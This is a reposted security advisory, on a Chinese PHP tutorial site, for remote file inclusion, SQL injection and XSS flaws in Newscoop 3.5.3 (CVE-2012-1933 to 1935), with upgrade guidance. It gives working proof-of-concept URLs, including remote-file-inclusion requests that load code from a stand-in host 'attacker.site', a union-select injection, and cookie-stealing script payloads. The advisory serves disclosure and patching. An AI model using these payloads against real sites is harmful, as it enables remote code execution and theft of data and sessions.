网站地图    收藏   

主页 > 后端 > 网站安全 >

Newscoop 3.5.3多个缺陷及修复 - 网站安全 - 自学ph

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 涉及产品: Newscoop作者 : Sourcefabric o.p.s.影响版本: 3.5.3 and probably prior, partially 4.0 RC3已测试版本: 3.5.3漏洞类型: Remote File Inclusion, SQL Injection, Cross-Site Scri......

涉及产品: Newscoop 
 
作者 : Sourcefabric o.p.s. 
 
影响版本: 3.5.3 and probably prior, partially 4.0 RC3 
 
已测试版本: 3.5.3 
 
漏洞类型: Remote File Inclusion, SQL Injection, Cross-Site Scripting (XSS)  
 
CVE Reference(s): CVE-2012-1933, CVE-2012-1934, CVE-2012-1935 
 
解决方案: 开发者已经升级

Risk Level: High  
 
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )  
 
  
分析
  
 
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Inclusion, SQL Injection and Cross-Site Scripting (XSS) attacks. 
 
  
 
  
 
1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933 
 
  
 
1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files. 
 
  
 
The following PoC (Proof of Concept) demonstrates the vulnerability: 
 
  
 
http://www.2cto.com /include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00 
 
  
 
1.2 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /conf/install_conf.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files. 
 
  
 
The following PoC demonstrates the vulnerability: 
 
  
 
http://[host]/conf/install_conf.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00 
 
  
 
1.3 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /conf/liveuser_configuration.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files. 
 
  
 
The following PoC demonstrates the vulnerability: 
 
  
 
http://[host]/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00 
 
  
 
Successful exploitation of these vulnerabilities (1.1 - 1.3) requires that "register_globals" is enabled. 
 
  
 
  
 
2) SQL Injection in Newscoop: CVE-2012-1934 
 
  
 
2.1 Input passed via the "f_country_code" GET parameter to /admin/country/edit.php is not properly sanitised before being used in SQL query. 
 
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 
 
  
 
The following PoC (Proof of Concept) demonstrates the vulnerability: 
 
  
 
http://www.2cto.com /admin/country/edit.php?f_country_code=%27%20union%20select%201,2,version%28%29%20--%202 
 
  
 
Successful exploitation of the vulnerability requires attacker to be registered and logged-in and to have permission to manage countries. For successful exploitation "magic_quotes_gpc" should be disabled as well. 
 
  
 
  
 
3) Multiple Cross-Site Scripting (XSS) in Newscoop: CVE-2012-1935 
 
  
 
3.1 Input passed via the "Back" GET parameter to /admin/ad.php is not properly sanitised before being returned to the user. 
 
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of the affected website. 
 
  
 
The following PoC (Proof of Concept) demonstrates the vulnerability: 
 
  
 
http://[host]/admin/ad.php?Back=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
 
  
 
3.2 Input passed via the "error_code" GET parameter to /admin/login.php is not properly sanitised before being returned to the user. 
 
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website. 
 
  
 
The following PoC demonstrates the vulnerability: 
 
  
 
http://[host]/admin/login.php?error_code=upgrade&f_user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
 
  
 
3.3 Input passed via the "token" and "f_email" GET parameters to /admin/password_check_token.php is not properly sanitised before being returned to the user. 
 
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website. 
 
  
 
The following PoC demonstrate the vulnerabilities: 
 
  
 
http://[host]/admin/password_check_token.php?token=1&f_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
 
http://[host]/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
 
  
 
----------------------------------------------------------------------------------------------- 
 
  
解决方案
 
升级到 Newscoop 3.5.5 
 
Make sure that "register_globals" is set to off (fix for CVE-2012-1933) 
 
  
 
More Information: 
 
http://www.sourcefabric.org/en/newscoop/latestrelease/1141/Newscoop-355-and-Newscoop-4-RC4-security-releases.htm 
 
http://dev.sourcefabric.org/browse/CS-4179 
 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论